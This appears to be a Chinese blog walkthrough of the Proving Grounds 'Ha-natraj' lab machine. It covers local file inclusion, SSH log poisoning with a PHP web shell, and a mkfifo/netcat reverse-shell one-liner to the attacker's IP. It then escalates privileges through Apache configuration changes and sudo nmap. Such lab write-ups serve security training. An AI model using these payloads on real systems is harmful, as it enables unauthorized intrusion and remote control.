PG::Ha-natraj

最新推荐文章于 2024-07-17 23:48:55 发布
最新推荐文章于 2024-07-17 23:48:55 发布
阅读量603 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128040239
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.134.80
image.png
nmap -Pn -p 22,80 -sCV 192.168.134.80
image.png
查看80端口的页面
image.png
未发现可利用的信息,对路径进行爆破
image.png
在/console目录下发现file.php
image.png
测试发现有本地文件包含
image.png
未发现别的利用方式,结合之前做过的靶机,进行日志包含,经过测试发现ssh日志可以利用
image.png
image.png
ssh登录,发现可以读取phpinfo
image.png
把shell写进日志 ‘<?php system($_GET["cmd"]);?>’
image.png
反弹shell,这里的shell需要URL编码一下
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.134 4444 >/tmp/f
image.png
sudo -l发现可以对apache服务进行操作
image.png
上传linpeas脚本进行枚举
image.png
思路:替换apache文件执行的用户,然后上传一个php-reverse-shell到/var/www/html目录下,这样可以弹回该用户的shell。这里不能修改为root用户,是因为改为root服务无法启动。
拷贝文件至本地,添加用户
image.png
上传至靶机,并替换掉原文件
image.png
上传shell至网站根目录
image.png
重启apache服务,得到shell
image.png
image.png
image.png
利用nmap的sudo提权
https://gtfobins.github.io/gtfobins/nmap/#sudo
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
拉吉拉曼
02-16
你好呀 :waving_hand: ,我是Natraj 我在Power Platform中工作 我原籍印度,但目前居住在澳大利亚墨尔本 :kangaroo: 。 我是典型印度人的刻板印象-我学习了非CS工程学,但是我目前在技术行业工作。 我最初是一名...
PG::OnSystemShellDredd
aya3t的博客
11-29 216
PROVING GROUNDS::OnSystemShellDredd
vulnhub HA: Natraj
箭雨镜屋
06-30 1217
渗透思路:nmap扫描----dirb扫描网站目录----ffuf爆破url参数----利用auth.log和LFI获得反弹shell----修改/etc/apache2/apache2.conf获得mahakal的shell----sudo nmap提权
vulhub-HA:Natraj
2201_75378806的博客
05-14 264
因为这是 auth.log 并且访问机器的唯一方法是通过 ssh。3.在kali上创建一个php的reverseshell并将其上传到目标。检查了是否可以访问任何日志文件(apache2、auth 等)。尝试了不同的 shell(nc、python2、python3)。Python3 是成功的。fuzz大法,看看有没有参数(可以用Bp)一开始是fuzz文件,后来直接fuzz参数。2.使用wget将文件上传到目标机器并复制该文件以替换apache2的实际配置文件。尝试访问这些用户的 ssh 密钥,没成功。
【打靶练习】vulnhub: Natraj
守拙的博客
07-23 224
Natraj靶机操作练习,文件包含、日志注入、apache配置提权、nmap提权
Natraj靶场渗透测试
qq_41567985的博客
11-13 135
Natraj靶场渗透测试主要通过文件包含,本地包含ssh登录日志,因为登录日志会记录错误的登录用户名,所以导致了一句话木马的写入。使用蚁剑进入tmp目录,使用wget命令下载mshell.elf文件,并赋予执行权限,执行mshell.elf文件。用户名test被记录进入了该文件,那么我们可以猜测-把用户名写成一句话木马,应该也能被写入。查看日志/vat/log/auth.log 发现记录了ssh登录历史。# 目标机器到tmp目录下下载(有下载权限)使用curl查看该日志文件可以发现。
OSCP Ha-natraj WP
m0_52545432的博客
07-20 144
开扫22 ssh80 http有可能是在网站上,找出ssh的用户没找出明显的cms直接目录扫描console下有一个file.php怀疑有文件包含漏洞,尝试爆破参数,利用wfuzz,爆破出为file可以查看到有几个用户natraj和mahakal,可以尝试ssh爆破一下,但是没有结果文件包含,可以尝试一下能不能利用apache的登录日志,先查看日志路径/var/log/auth.log 可以查看用户的登录可以去ssh登录试试,虽然不知道密码,但是这边会有记录。
OSCP系列靶场-Esay-Ha-natraj
2301_80127209的博客
03-21 596
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo级别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
PG::Seppuku
aya3t的博客
11-28 301
PROVING GROUNDS::Seppuku
OSCP-1-3-natraj(本地文件包含、日志中毒、apache2配置漏洞、nmap提权)
墨痕诉清风的博客
06-30 192
像往常一样,我们将使用“Netdiscover”工具识别主机的 IP。所以,让我们首先用 nmap 列出所有 TCP 端口。我们从访问web服务(80端口)开始,在那里我们找到了几张关于Natraj的图片和信息,我们将查看源代码和robots.txt,似乎没有什么有用的。(或至少,目前)。因此,让我们继续进行。在 Dirb 及其默认字典的帮助下,我们找到了一个名为“”的目录。我们进入并列出一个名为“”的文件:如果我们执行它,我们会看到它什么也不做。我们可能需要添加其他内容。
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1991
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
kali渗透综合靶机(九)--Typhoon靶机
W小哥
03-27 4506
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Typhoon靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.9 1、主机...
kali渗透综合靶机(十一)--BSides-Vancouver靶机
W小哥
03-29 605
一、靶机下载 下载链接:https://pan.baidu.com/s/1s2ajnWHNVS_NZfnAjGpEvw 二、BSides-Vancouver靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.5 靶机IP:192.168.212.7...
Vulnhub GlasgowSmile靶机渗透记录
m0_43424471的博客
10-13 1234
环境配置 镜像下载地址:http://www.vulnhub.com/entry/glasgow-smile-11,491/ 目标:三个user.txt,root权限 Kali Linux IP: 192.168.1.128 GlasgowSmile IP: 192.168.1.142 信息收集 利用netdiscover进行主机发现: netdiscover -i 网卡设备名 使用nmap进行端口扫描: nmap -A -p- -sS 192.168.1.142 使用dirb对80端口
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1170
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 808
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 508
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 564
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 1059
区分不同的签名。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 652
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值